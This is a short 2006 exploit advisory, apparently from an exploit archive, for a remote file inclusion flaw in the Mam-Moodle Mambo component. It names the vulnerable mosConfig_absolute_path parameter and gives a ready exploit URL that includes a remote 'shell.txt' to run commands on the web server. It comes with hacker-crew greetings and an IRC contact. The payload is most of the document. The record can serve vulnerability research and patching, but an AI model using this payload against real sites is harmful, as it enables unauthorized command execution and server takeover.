id: 604
date: 07/22/2006
title: Mam-Moodle Mambo Component alpha Remote Inclusion Vulnerability
author: jank0
cves: 

===============================================================
Mam-Moodle Mambo Component alpha Remote Inclusion Vulnerability
===============================================================



####################################################################################
#Mam - Moodle Remote File Include
------------------------------------------------------------------------------------
#Bug Found by: jank0
#greetz: hackbsd crew
#risk: dangerous
##this bug allows a remote atacker to execute commands via rfi

path: ?mosConfig_absolute_path=

xpl:
http://web/components/com_moodle/moodle.php?mosConfig_absolute_path=http://shell.txt

Contact: irc.undernet.org #hackbsd


#  0day.today [2023-03-23]  #